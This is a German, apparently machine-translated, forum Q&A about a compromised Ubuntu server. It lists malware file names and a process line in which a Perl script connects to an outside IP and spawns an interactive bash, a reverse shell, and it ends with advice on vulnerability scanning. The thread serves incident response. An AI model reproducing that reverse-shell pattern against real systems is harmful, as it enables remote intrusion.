Bei mir läuft ein Ubuntu-Server. Heute habe ich über den Amazon-Missbrauchsbericht herausgefunden, dass der Server gehackt wurde und für DDoS-Angriffe missbraucht wird.
Ich habe folgende Dinge auf dem Server gefunden.
Auf dem Server befanden sich folgende verdächtige Dateien.
-rw-r--r-- 1 www-data www-data 759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data 1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data 5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data 1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data 5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data 119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data 73 Feb 1 01:01 conf.n
Der folgende Prozess lief
www-data 8292 10629 0 Jan28 ? 00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data 8293 8292 0 Jan28 ? 00:00:00 /bin/bash -i
www-data 8293 8292 0 Jan28 ? 00:00:00 ./huizhen
Ich habe es ausgeführt clamavund es hat Dateien gelöscht /tmp/huizhen, /tmp/sishenaber die Prozesse liefen noch weiwei.pl, ./huizhenalso habe ich sie manuell beendet.
Auf meinem Server laufen bei mir folgende Dienste:
- SSH - Standardport 22 wird nicht verwendet, nur Schlüsselauthentifizierung
- MongoDB - Port ist für eine bestimmte Sicherheitsgruppe geöffnet
- Memcache – Port ist für eine bestimmte Sicherheitsgruppe geöffnet
- NodeJS - Port ist für eine bestimmte Sicherheitsgruppe geöffnet
- Tomcat – 8080/8443-Ports sind öffentlich für den Axis2-Webservice und Solr
Ich gehe davon aus, dass sich der Hacker über eine Sicherheitslücke in Tomcat/Axis2/Solr Zugang verschafft hat, da die Prozesse mit derselben Benutzergruppe wie Tomcat ausgeführt werden.
Ich habe die Ports 8080/8443 vorerst blockiert und werde den Server durch einen neuen ersetzen. Tomcat wird von einem anderen Server aus über nginx erreichbar sein. Ich habe auch Sicherheitspatches installiert mitunbeaufsichtigte Upgrades.
Das Problem besteht darin, herauszufinden, wie der Hacker eingedrungen ist und die Trojaner platziert hat. Welche weiteren Schritte kann ich unternehmen, um die Sicherheit zu erhöhen?
Antwort1
Das ist eine durchaus berechtigte Frage. Streng genommen wäre es am besten gewesen, Ihr System einzufrieren und forensische Tests durchzuführen. Jeder spätere Eingriff Ihrerseits, einschließlich der Entfernung von Viren, verändert und löscht möglicherweise alle von Ihrem Eindringling hinterlassenen Spuren.
Da dieser Weg für Sie nicht mehr offen steht, verwenden Sie am besten einen Vulnerability Scanner, ein Programmdhgenau darauf ausgelegt, Ihre Installation einem Stresstest zu unterziehen. Es gibt sehr viele, Sie können den Begriff einfach googeln Vulnerability Scanner, aber der bei weitem bekannteste istNessus. Es gibt mehrere Versionen, von kostenlos bis kostenpflichtig mit unterschiedlichen Lizenzen, und es kann ziemlich teuer werden, möglicherweise mehr, als Sie bereit sind, auszugeben.
Es gibt jedoch auch eine kostenlose Version davon, die vorinstalliert ist aufKali Linux. Sie müssen es registrieren, obwohl es völlig kostenlos ist. Viele von uns verwenden Kali, indem sie es auf einer VM auf einem Laptop installieren und dann die Stresstests außerhalb unseres Zuhauses durchführen, um zu sehen, welche Defekte (= meist nicht gepatchte, bekannte Schwachstellen) in den Anwendungen verbleiben, die auf einem mit dem Internet verbundenen Server laufen.
Überall im Internet finden Sie Anleitungen zur Verwendung und Sie können es auch in Ihrem eigenen LAN ausprobieren (wenn Sie Ihrer Firewall vertrauen) und sogar auf demselben PC, wenn Sie Kali als VM ausführen.